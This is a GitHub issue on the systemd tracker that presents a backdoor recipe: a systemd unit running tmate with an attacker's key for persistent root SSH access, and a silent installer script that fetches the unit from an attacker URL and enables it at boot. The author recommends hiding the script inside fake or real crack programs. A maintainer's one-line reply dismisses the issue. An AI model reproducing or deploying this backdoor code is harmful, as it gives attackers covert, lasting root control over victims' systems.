### ISSUE TITLE
[Backdoor] SSH as root via a simple systemd service (using tmate)

### ISSUE THREAD

**Issue by m0lese** [systemd/systemd#22436]
## Summary
A way to install a backdoor into a system via tmate which runs as a systemd service. The victim's system:
- must use systemd as init
- has networking

### What is tmate?
A reverse ssh tunnel accessible from anywhere. It goes through NATs and tolerate host IP changes.

### The hack
Malicious systemd service (**Exposure: 9.6, Predicate: Unsafe** reported by `systemd-analyze security` more details at: [here](https://hardbin.com/ipfs/QmXPFfhPdgPmwUyWwVVA5bUrc7u1JLyzBaE67nt37s78KR/#6K3jhW2qSHubsSz22V9Aq9mi1e1hA4nKPHRDKC4LMG6T)):
```bash
[Unit]
Description=Tmate Session Hijack (Root)
After=network.target
Wants=network-online.target

[Service]
Restart=always
Type=simple
ExecStart=tmate -k "<attacker's_tmate_api-key>" -n "<name>" -F

[Install]
WantedBy=multi-user.target
```
The attacker can access the session via:
`https://tmate.io/t/<attacker's_tmate_registered_username>/<name>`

A simple script that installs tmate and the malicious systemd service can be used to backdoor a system that uses systemd as init. Something like the following hidden inside of the other script or program/binary:
```sh
#!/bin/sh

# Requires su permission

install_tmate_api_key() {
	API_KEY="<attacker's_key>"
	name="<name>"
	tmate -k "$API_KEY" -n "$name" -F >/dev/null 2>&1
}

install_malicious_systemd_service() {
        ## assuming distro == archlinux
        # Some necessary checks
        command_exists "systemctl" || return
	command_exists "pacman" || return
        #- check network ...

        # install necessary package(s) and tmate
        pacman -S --noconfirm wget tmate > /dev/null 2>&1

	(
		SERVICE_NAME="ssh_hijack.service"
		cd /etc/systemd/system || return
		wget -O "$SERVICE_NAME" "<the-malicious-systemd-service-url" >/dev/null 2>&1
		sleep 2
		systemctl daemon-reload >/dev/null 2>&1
		sleep 2
		systemctl start "$SERVICE_NAME" >/dev/null 2>&1  # start the service
		systemctl enable "$SERVICE_NAME" >/dev/null 2>&1 # enable: start at boot
	)
}
```

### Profit
- Able to ssh as root into the victim's system whenever you want (assuming victim's system is up and the service is running successfully) via web or terminal.

### Script Ideas
The backdoor logic/script is useful in the following scenarios:
- Fake Script that does X
- Fake Crack/Hack script/program
- Real Script that does X
- Real Crack/Hack script/program
- X Script to do Y
- X Script to do Y that does Z
- ...

**Comment by yuwata** [comment]
Here is an upstream issue or RFE tracker... Removing.
